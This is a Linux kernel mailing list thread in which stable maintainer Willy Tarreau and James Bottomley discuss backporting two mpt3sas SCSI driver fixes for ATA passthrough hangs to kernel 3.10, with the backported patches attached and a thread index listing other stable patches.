  commit ffb58456589443ca572221fabbdef3db8483a779
  Author: James Bottomley <James.Bottomley@HansenPartnership.com>
  Date:   Sun Jan 1 09:39:24 2017 -0800

    scsi: mpt3sas: fix hang on ata passthrough commands
    
    mpt3sas has a firmware failure where it can only handle one pass through
    ATA command at a time.  If another comes in, contrary to the SAT
    standard, it will hang until the first one completes (causing long
    commands like secure erase to timeout).  The original fix was to block
    the device when an ATA command came in, but this caused a regression
    with
    
    commit 669f044170d8933c3d66d231b69ea97cb8447338
    Author: Bart Van Assche <bart.vanassche@sandisk.com>
    Date:   Tue Nov 22 16:17:13 2016 -0800
    
        scsi: srp_transport: Move queuecommand() wait code to SCSI core
    
    So fix the original fix of the secure erase timeout by properly
    returning SAM_STAT_BUSY like the SAT recommends.  The original patch
    also had a concurrency problem since scsih_qcmd is lockless at that
    point (this is fixed by using atomic bitops to set and test the flag).
    
    [mkp: addressed feedback wrt. test_bit and fixed whitespace]
    
    Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature termination)
    Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
    Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
    Reviewed-by: Christoph Hellwig <hch@lst.de>
    Reported-by: Ingo Molnar <mingo@kernel.org>
    Tested-by: Ingo Molnar <mingo@kernel.org>
    Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>

We don't have the referenced commit above in 3.10 so we should be safe.
Additionally I checked that neither 4.4 nor 3.12 have them either, so
that makes me feel confident that we can skip it in 3.10 as well.

Thanks!
Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-06 22:26     ` Willy Tarreau
@ 2017-02-07  6:38       ` James Bottomley
  2017-02-07  6:59         ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: James Bottomley @ 2017-02-07  6:38 UTC (permalink / raw)
  To: Willy Tarreau, Sathya Prakash Veerichetty
  Cc: linux-kernel, stable, linux, Andrey Grodzovsky, linux-scsi,
	Chaitra Basappa, Suganath Prabu Subramani, Sreekanth Reddy,
	Hannes Reinecke, Martin K . Petersen

On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> Hi Sathya,
> 
> On Mon, Feb 06, 2017 at 09:21:44AM -0700, Sathya Prakash Veerichetty
> wrote:
> > Willy,
> > I think this patch had a problem and later modified to a different
> > blocking mechanism.  Could you please pull in the latest change for
> > this?
> 
> Much appreciated, thanks. I've checked and found the patch you're
> talking about :
> 
>   commit ffb58456589443ca572221fabbdef3db8483a779
>   Author: James Bottomley <James.Bottomley@HansenPartnership.com>
>   Date:   Sun Jan 1 09:39:24 2017 -0800
> 
>     scsi: mpt3sas: fix hang on ata passthrough commands
>     
>     mpt3sas has a firmware failure where it can only handle one pass
> through
>     ATA command at a time.  If another comes in, contrary to the SAT
>     standard, it will hang until the first one completes (causing
> long
>     commands like secure erase to timeout).  The original fix was to
> block
>     the device when an ATA command came in, but this caused a
> regression
>     with
>     
>     commit 669f044170d8933c3d66d231b69ea97cb8447338
>     Author: Bart Van Assche <bart.vanassche@sandisk.com>
>     Date:   Tue Nov 22 16:17:13 2016 -0800
>     
>         scsi: srp_transport: Move queuecommand() wait code to SCSI
> core
>     
>     So fix the original fix of the secure erase timeout by properly
>     returning SAM_STAT_BUSY like the SAT recommends.  The original
> patch
>     also had a concurrency problem since scsih_qcmd is lockless at
> that
>     point (this is fixed by using atomic bitops to set and test the
> flag).
>     
>     [mkp: addressed feedback wrt. test_bit and fixed whitespace]
>     
>     Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature
> termination)
>     Signed-off-by: James Bottomley <
> James.Bottomley@HansenPartnership.com>
>     Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
>     Reviewed-by: Christoph Hellwig <hch@lst.de>
>     Reported-by: Ingo Molnar <mingo@kernel.org>
>     Tested-by: Ingo Molnar <mingo@kernel.org>
>     Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
> 
> We don't have the referenced commit above in 3.10 so we should be 
> safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> either, so that makes me feel confident that we can skip it in 3.10
> as well.

The original was also racy with respect to multiple commands, so the
above fixed the race as well.

James

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07  6:38       ` James Bottomley
@ 2017-02-07  6:59         ` Willy Tarreau
  2017-02-07 17:02           ` James Bottomley
  0 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-07  6:59 UTC (permalink / raw)
  To: James Bottomley
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

Hi James,

On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
(...)
> > We don't have the referenced commit above in 3.10 so we should be 
> > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > either, so that makes me feel confident that we can skip it in 3.10
> > as well.
> 
> The original was also racy with respect to multiple commands, so the
> above fixed the race as well.

OK so I tried to backport it to 3.10. I dropped a few parts which were
addressing this one marked for stable 4.4+ :
    7ff723a ("scsi: mpt3sas: Unblock device after controller reset")

And I got the attached patch. All I know is that it builds. I'd appreciate
it if someone could confirm its validity, in which case I'll add it.

Thanks,
Willy

---

diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
index 994656c..997e13f 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
+++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
@@ -219,6 +219,7 @@ struct MPT3SAS_TARGET {
  * @eedp_enable: eedp support enable bit
  * @eedp_type: 0(type_1), 1(type_2), 2(type_3)
  * @eedp_block_length: block size
+ * @ata_command_pending: SATL passthrough outstanding for device
  */
 struct MPT3SAS_DEVICE {
 	struct MPT3SAS_TARGET *sas_target;
@@ -227,6 +228,17 @@ struct MPT3SAS_DEVICE {
 	u8	configured_lun;
 	u8	block;
 	u8	tlr_snoop_check;
+	/*
+	 * Bug workaround for SATL handling: the mpt2/3sas firmware
+	 * doesn't return BUSY or TASK_SET_FULL for subsequent
+	 * commands while a SATL pass through is in operation as the
+	 * spec requires, it simply does nothing with them until the
+	 * pass through completes, causing them possibly to timeout if
+	 * the passthrough is a long executing command (like format or
+	 * secure erase).  This variable allows us to do the right
+	 * thing while a SATL command is pending.
+	 */
+	unsigned long ata_command_pending;
 };
 
 #define MPT3_CMD_NOT_USED	0x8000	/* free */
diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index e414b71..db38f70 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3515,9 +3515,18 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
-static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+static int _scsih_set_satl_pending(struct scsi_cmnd *scmd, bool pending)
 {
-	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+	struct MPT3SAS_DEVICE *priv = scmd->device->hostdata;
+
+	if (scmd->cmnd[0] != ATA_12 && scmd->cmnd[0] != ATA_16)
+		return 0;
+
+	if (pending)
+		return test_and_set_bit(0, &priv->ata_command_pending);
+
+	clear_bit(0, &priv->ata_command_pending);
+	return 0;
 }
 
 /**
@@ -3547,13 +3556,6 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif
 
-	/*
-	 * Lock the device for any subsequent command until command is
-	 * done.
-	 */
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_block(scmd->device);
-
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -3568,6 +3570,19 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		return 0;
 	}
 
+	/*
+	 * Bug work around for firmware SATL handling.  The loop
+	 * is based on atomic operations and ensures consistency
+	 * since we're lockless at this point
+	 */
+	do {
+		if (test_bit(0, &sas_device_priv_data->ata_command_pending)) {
+			scmd->result = SAM_STAT_BUSY;
+			scmd->scsi_done(scmd);
+			return 0;
+		}
+	} while (_scsih_set_satl_pending(scmd, true));
+
 	sas_target_priv_data = sas_device_priv_data->sas_target;
 
 	/* invalid device handle */
@@ -4057,8 +4072,7 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+	_scsih_set_satl_pending(scmd, false);
 
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);
 

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07  6:59         ` Willy Tarreau
@ 2017-02-07 17:02           ` James Bottomley
  2017-02-07 17:12             ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: James Bottomley @ 2017-02-07 17:02 UTC (permalink / raw)
  To: Willy Tarreau
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

On Tue, 2017-02-07 at 07:59 +0100, Willy Tarreau wrote:
> Hi James,
> 
> On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> > On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> (...)
> > > We don't have the referenced commit above in 3.10 so we should be
> > > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > > either, so that makes me feel confident that we can skip it in 
> > > 3.10 as well.
> > 
> > The original was also racy with respect to multiple commands, so 
> > the above fixed the race as well.
> 
> OK so I tried to backport it to 3.10. I dropped a few parts which 
> were addressing this one marked for stable 4.4+ :
>     7ff723a ("scsi: mpt3sas: Unblock device after controller reset")
> 
> And I got the attached patch. All I know is that it builds. I'd 
> appreciate it if someone could confirm its validity, in which case
> I'll add it.

The two patches apply without fuzz to your tree and the combination is
a far better bug fix than the original regardless of whether 7ff723a
exists in your tree or not.  By messing with the patches all you do is
add the potential for introducing new bugs for no benefit, so why take
risk for no upside?

James

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07 17:02           ` James Bottomley
@ 2017-02-07 17:12             ` Willy Tarreau
  2017-02-08  6:53               ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-07 17:12 UTC (permalink / raw)
  To: James Bottomley
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

On Tue, Feb 07, 2017 at 09:02:51AM -0800, James Bottomley wrote:
> On Tue, 2017-02-07 at 07:59 +0100, Willy Tarreau wrote:
> > Hi James,
> > 
> > On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> > > On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> > (...)
> > > > We don't have the referenced commit above in 3.10 so we should be
> > > > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > > > either, so that makes me feel confident that we can skip it in 
> > > > 3.10 as well.
> > > 
> > > The original was also racy with respect to multiple commands, so 
> > > the above fixed the race as well.
> > 
> > OK so I tried to backport it to 3.10. I dropped a few parts which 
> > were addressing this one marked for stable 4.4+ :
> >     7ff723a ("scsi: mpt3sas: Unblock device after controller reset")
> > 
> > And I got the attached patch. All I know is that it builds. I'd 
> > appreciate it if someone could confirm its validity, in which case
> > I'll add it.
> 
> The two patches apply without fuzz to your tree and the combination is
> a far better bug fix than the original regardless of whether 7ff723a
> exists in your tree or not.  By messing with the patches all you do is
> add the potential for introducing new bugs for no benefit, so why take
> risk for no upside?

Just because I'm suggested to apply this fix which is supposed to fix
a regression brought by 7ff723a which itself is marked to fix 4.4+ only
and which doesn't apply to 3.10. So now I'm getting confused because
you say that these patches apply without fuzz but one part definitely
is rejected and the other one has to be applied by hand. I want not
to take a risk but I'm faced with these options :
  - drop all these patches and stay as 3.10.104 is
  - merge the "secure erase premature" + the the part of the patch
    that supposedly fixes the regression it introduced
  - merge this fix + 7ff723a + whatever it depends on (not fond of
    it)

In all cases I don't even have the hardware to validate anything. I'd
be more tempted with the first two options. If you think I'm taking
risks by backporting the relevant part of the fix, I'll simply drop
them all and leave the code as it is now.

Thanks,
Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07 17:12             ` Willy Tarreau
@ 2017-02-08  6:53               ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-08  6:53 UTC (permalink / raw)
  To: James Bottomley
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

[-- Attachment #1: Type: text/plain, Size: 2630 bytes --]

On Tue, Feb 07, 2017 at 06:12:34PM +0100, Willy Tarreau wrote:
> On Tue, Feb 07, 2017 at 09:02:51AM -0800, James Bottomley wrote:
> > On Tue, 2017-02-07 at 07:59 +0100, Willy Tarreau wrote:
> > > Hi James,
> > > 
> > > On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> > > > On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> > > (...)
> > > > > We don't have the referenced commit above in 3.10 so we should be
> > > > > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > > > > either, so that makes me feel confident that we can skip it in 
> > > > > 3.10 as well.
> > > > 
> > > > The original was also racy with respect to multiple commands, so 
> > > > the above fixed the race as well.
> > > 
> > > OK so I tried to backport it to 3.10. I dropped a few parts which 
> > > were addressing this one marked for stable 4.4+ :
> > >     7ff723a ("scsi: mpt3sas: Unblock device after controller reset")
> > > 
> > > And I got the attached patch. All I know is that it builds. I'd 
> > > appreciate it if someone could confirm its validity, in which case
> > > I'll add it.
> > 
> > The two patches apply without fuzz to your tree and the combination is
> > a far better bug fix than the original regardless of whether 7ff723a
> > exists in your tree or not.  By messing with the patches all you do is
> > add the potential for introducing new bugs for no benefit, so why take
> > risk for no upside?
> 
> Just because I'm suggested to apply this fix which is supposed to fix
> a regression brought by 7ff723a which itself is marked to fix 4.4+ only
> and which doesn't apply to 3.10. So now I'm getting confused because
> you say that these patches apply without fuzz but one part definitely
> is rejected and the other one has to be applied by hand. I want not
> to take a risk but I'm faced with these options :
>   - drop all these patches and stay as 3.10.104 is
>   - merge the "secure erase premature" + the the part of the patch
>     that supposedly fixes the regression it introduced
>   - merge this fix + 7ff723a + whatever it depends on (not fond of
>     it)
> 
> In all cases I don't even have the hardware to validate anything. I'd
> be more tempted with the first two options. If you think I'm taking
> risks by backporting the relevant part of the fix, I'll simply drop
> them all and leave the code as it is now.

So I could backport the fix marked for 4.4+ (7ff723a) and the one
suggested by Sathya (ffb5845). The context was slightly different
but the changes obvious enough to look good. If everyone is OK, I'll
add these two commits. Here are the backports.

Willy

[-- Attachment #2: 0001-scsi-mpt3sas-Unblock-device-after-controller-reset.patch --]
[-- Type: text/plain, Size: 2392 bytes --]

>From acd34b89fe261c88398e26bd3055000052eb7808 Mon Sep 17 00:00:00 2001
From: Suganath Prabu S <suganath-prabu.subramani@broadcom.com>
Date: Thu, 17 Nov 2016 16:15:58 +0530
Subject: scsi: mpt3sas: Unblock device after controller reset

commit 7ff723ad0f87feba43dda45fdae71206063dd7d4 upstream.

While issuing any ATA passthrough command to firmware the driver will
block the device. But it will unblock the device only if the I/O
completes through the ISR path. If a controller reset occurs before
command completion the device will remain in blocked state.

Make sure we unblock the device following a controller reset if an ATA
passthrough command was queued.

[mkp: clarified patch description]

Cc: <stable@vger.kernel.org> # v4.4+
Fixes: ac6c2a93bd07 ("mpt3sas: Fix for SATA drive in blocked state, after diag reset")
Signed-off-by: Suganath Prabu S <suganath-prabu.subramani@broadcom.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
[wt: adjust context]
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index e414b71..8979403 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3390,6 +3390,11 @@ _scsih_check_volume_delete_events(struct MPT3SAS_ADAPTER *ioc,
 		    le16_to_cpu(event_data->VolDevHandle));
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
+
 /**
  * _scsih_flush_running_cmds - completing outstanding commands.
  * @ioc: per adapter object
@@ -3411,6 +3416,9 @@ _scsih_flush_running_cmds(struct MPT3SAS_ADAPTER *ioc)
 		if (!scmd)
 			continue;
 		count++;
+		if (ata_12_16_cmd(scmd))
+			scsi_internal_device_unblock(scmd->device,
+							SDEV_RUNNING);
 		mpt3sas_base_free_smid(ioc, smid);
 		scsi_dma_unmap(scmd);
 		if (ioc->pci_error_recovery)
@@ -3515,11 +3523,6 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
-static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
-{
-	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
-}
-
 /**
  * _scsih_qcmd_lck - main scsi request entry point
  * @scmd: pointer to scsi command object
-- 
2.8.0.rc2.1.gbe9624a


[-- Attachment #3: 0002-scsi-mpt3sas-fix-hang-on-ata-passthrough-commands.patch --]
[-- Type: text/plain, Size: 5552 bytes --]

>From 4367c8585788a98b1cc2f36af40a3d4f1fef86d0 Mon Sep 17 00:00:00 2001
From: James Bottomley <James.Bottomley@HansenPartnership.com>
Date: Sun, 1 Jan 2017 09:39:24 -0800
Subject: scsi: mpt3sas: fix hang on ata passthrough commands

commit ffb58456589443ca572221fabbdef3db8483a779 upstream.

mpt3sas has a firmware failure where it can only handle one pass through
ATA command at a time.  If another comes in, contrary to the SAT
standard, it will hang until the first one completes (causing long
commands like secure erase to timeout).  The original fix was to block
the device when an ATA command came in, but this caused a regression
with

commit 669f044170d8933c3d66d231b69ea97cb8447338
Author: Bart Van Assche <bart.vanassche@sandisk.com>
Date:   Tue Nov 22 16:17:13 2016 -0800

    scsi: srp_transport: Move queuecommand() wait code to SCSI core

So fix the original fix of the secure erase timeout by properly
returning SAM_STAT_BUSY like the SAT recommends.  The original patch
also had a concurrency problem since scsih_qcmd is lockless at that
point (this is fixed by using atomic bitops to set and test the flag).

[mkp: addressed feedback wrt. test_bit and fixed whitespace]

Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature termination)
Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reported-by: Ingo Molnar <mingo@kernel.org>
Tested-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
[wt: adjust context]
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_base.h  | 12 +++++++++++
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 40 +++++++++++++++++++++++-------------
 2 files changed, 38 insertions(+), 14 deletions(-)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
index 994656c..997e13f 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
+++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
@@ -219,6 +219,7 @@ struct MPT3SAS_TARGET {
  * @eedp_enable: eedp support enable bit
  * @eedp_type: 0(type_1), 1(type_2), 2(type_3)
  * @eedp_block_length: block size
+ * @ata_command_pending: SATL passthrough outstanding for device
  */
 struct MPT3SAS_DEVICE {
 	struct MPT3SAS_TARGET *sas_target;
@@ -227,6 +228,17 @@ struct MPT3SAS_DEVICE {
 	u8	configured_lun;
 	u8	block;
 	u8	tlr_snoop_check;
+	/*
+	 * Bug workaround for SATL handling: the mpt2/3sas firmware
+	 * doesn't return BUSY or TASK_SET_FULL for subsequent
+	 * commands while a SATL pass through is in operation as the
+	 * spec requires, it simply does nothing with them until the
+	 * pass through completes, causing them possibly to timeout if
+	 * the passthrough is a long executing command (like format or
+	 * secure erase).  This variable allows us to do the right
+	 * thing while a SATL command is pending.
+	 */
+	unsigned long ata_command_pending;
 };
 
 #define MPT3_CMD_NOT_USED	0x8000	/* free */
diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index 8979403..1d6e115 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3390,9 +3390,18 @@ _scsih_check_volume_delete_events(struct MPT3SAS_ADAPTER *ioc,
 		    le16_to_cpu(event_data->VolDevHandle));
 }
 
-static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+static int _scsih_set_satl_pending(struct scsi_cmnd *scmd, bool pending)
 {
-	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+	struct MPT3SAS_DEVICE *priv = scmd->device->hostdata;
+
+	if (scmd->cmnd[0] != ATA_12 && scmd->cmnd[0] != ATA_16)
+		return 0;
+
+	if (pending)
+		return test_and_set_bit(0, &priv->ata_command_pending);
+
+	clear_bit(0, &priv->ata_command_pending);
+	return 0;
 }
 
 /**
@@ -3416,9 +3425,7 @@ _scsih_flush_running_cmds(struct MPT3SAS_ADAPTER *ioc)
 		if (!scmd)
 			continue;
 		count++;
-		if (ata_12_16_cmd(scmd))
-			scsi_internal_device_unblock(scmd->device,
-							SDEV_RUNNING);
+		_scsih_set_satl_pending(scmd, false);
 		mpt3sas_base_free_smid(ioc, smid);
 		scsi_dma_unmap(scmd);
 		if (ioc->pci_error_recovery)
@@ -3550,13 +3557,6 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif
 
-	/*
-	 * Lock the device for any subsequent command until command is
-	 * done.
-	 */
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_block(scmd->device);
-
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -3571,6 +3571,19 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		return 0;
 	}
 
+	/*
+	 * Bug work around for firmware SATL handling.  The loop
+	 * is based on atomic operations and ensures consistency
+	 * since we're lockless at this point
+	 */
+	do {
+		if (test_bit(0, &sas_device_priv_data->ata_command_pending)) {
+			scmd->result = SAM_STAT_BUSY;
+			scmd->scsi_done(scmd);
+			return 0;
+		}
+	} while (_scsih_set_satl_pending(scmd, true));
+
 	sas_target_priv_data = sas_device_priv_data->sas_target;
 
 	/* invalid device handle */
@@ -4060,8 +4073,7 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+	_scsih_set_satl_pending(scmd, false);
 
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);
 
-- 
2.8.0.rc2.1.gbe9624a


^ permalink raw reply related	[flat|nested] 239+ messages in thread

end of thread, other threads:[~2017-02-08  6:56 UTC | newest]

Thread overview: 239+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 103/319] Fix potential infoleak in older kernels Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 112/319] USB: serial: mos7720: " Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 113/319] USB: serial: mos7840: " Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 115/319] USB: change bInterval default to 10 ms Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 132/319] zfcp: close window with unblocked rport during rport gone Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 133/319] zfcp: retain trace level for SCSI and HBA FSF response records Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 134/319] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 135/319] zfcp: trace on request for open and close of WKA port Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 136/319] zfcp: restore tracing of handle for port and LUN with HBA records Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels) Willy Tarreau
